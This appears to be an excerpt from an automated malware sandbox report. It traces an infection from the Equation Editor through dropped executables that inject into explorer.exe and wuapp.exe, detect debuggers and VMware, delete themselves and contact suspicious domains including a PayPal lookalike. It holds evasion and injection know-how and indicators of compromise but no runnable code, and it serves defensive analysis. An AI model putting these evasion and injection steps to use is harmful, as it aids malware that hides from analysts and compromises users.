Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe	RDTSC instruction interceptor: First address: 0000000000099904 second address: 000000000009990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe	RDTSC instruction interceptor: First address: 0000000000099B6E second address: 0000000000099B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 848	Thread sleep time: -300000s >= -30000s			Jump to behavior
Source: C:\Windows\explorer.exe TID: 3044	Thread sleep time: -46000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe TID: 2212	Thread sleep time: -42000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\wuapp.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wuapp.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 6_2_00409AA0 rdtsc

6_2_00409AA0

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

API coverage: 7.9 %

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,		4_2_00405426
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,		4_2_00405D9C
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 4_2_004026A1 FindFirstFileA,		4_2_004026A1

Source: C:\Users\user\AppData\Roaming\word.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	API call chain: ExitProcess graph end node

Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000007.00000000.1025894713.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: word.exe, 00000004.00000002.945543583.0000000000564000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000007.00000000.935522782.000000000037B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000007.00000000.1026232834.0000000004423000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1026135625.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,

5_2_009A320D

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 5_2_009A320D GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,

5_2_009A320D

Source: C:\Users\user\AppData\Roaming\word.exe

Code function: 4_2_00405DDA GetModuleHandleA,LoadLibraryA,GetProcAddress,

4_2_00405DDA

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 5_2_009B6AAA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

5_2_009B6AAA

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 6_2_00409AA0 rdtsc

6_2_00409AA0

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_000F03F8 mov eax, dword ptr fs:[00000030h]		5_2_000F03F8
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_000F061D mov eax, dword ptr fs:[00000030h]		5_2_000F061D
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_000F06F7 mov eax, dword ptr fs:[00000030h]		5_2_000F06F7
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_000F0736 mov eax, dword ptr fs:[00000030h]		5_2_000F0736
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_000F0772 mov eax, dword ptr fs:[00000030h]		5_2_000F0772
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_00A126F8 mov eax, dword ptr fs:[00000030h]		6_2_00A126F8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F726F8 mov eax, dword ptr fs:[00000030h]		8_2_01F726F8

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Code function: 6_2_0040ACE0 LdrLoadDll,

6_2_0040ACE0

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009B1D57 SetUnhandledExceptionFilter,		5_2_009B1D57
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 5_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		5_2_009B1D88
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009B1D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_009B1D88
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: 6_2_009B1D57 SetUnhandledExceptionFilter,		6_2_009B1D57

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe	Domain query: www.paypal-caseid521.com
Source: C:\Windows\explorer.exe	Network Connect: 98.137.244.37 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.storyofsol.com
Source: C:\Windows\explorer.exe	Domain query: www.createacarepack.com

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: B30000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Memory written: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Thread register set: target process: 1860			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Thread register set: target process: 1860			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe C:\Users\user\AppData\Roaming\word.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\word.exe	Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Process created: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\dvukljmnr.exe"			Jump to behavior

Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.961310848.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.950104825.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1022850637.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection

Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		5_2_009A3663
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,		5_2_009BE8C3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,		5_2_009BE970
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,		5_2_009BE1D4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,		5_2_009BE970
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,		5_2_009B8969
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		5_2_009A419C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,		5_2_009BEA44
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,		5_2_009B4CB1
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		5_2_009BE4A4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: EnumSystemLocalesW,		5_2_009BE448
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		5_2_009B9D92
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,		5_2_009A2703
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		5_2_009A2B81
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,		5_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		5_2_009BE521
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,		5_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,		5_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,		5_2_009BE799
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		5_2_009B8FA3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: GetLocaleInfoW,		5_2_009B9FDB
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,		5_2_009BA75F
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: EnumSystemLocalesW,		5_2_009B9F55
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		6_2_009A3663
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,		6_2_009BE8C3
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,		6_2_009BE970
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,		6_2_009BE1D4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,		6_2_009A1118
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,		6_2_009BE970
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,		6_2_009B8969
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		6_2_009A419C
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,		6_2_009BEA44
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,		6_2_009B4CB1
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		6_2_009BE4A4
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: EnumSystemLocalesW,		6_2_009BE448
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,		6_2_009B9D92
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,		6_2_009A2703
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,		6_2_009A2B81
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,		6_2_009B8529
Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,		6_2_009BE521
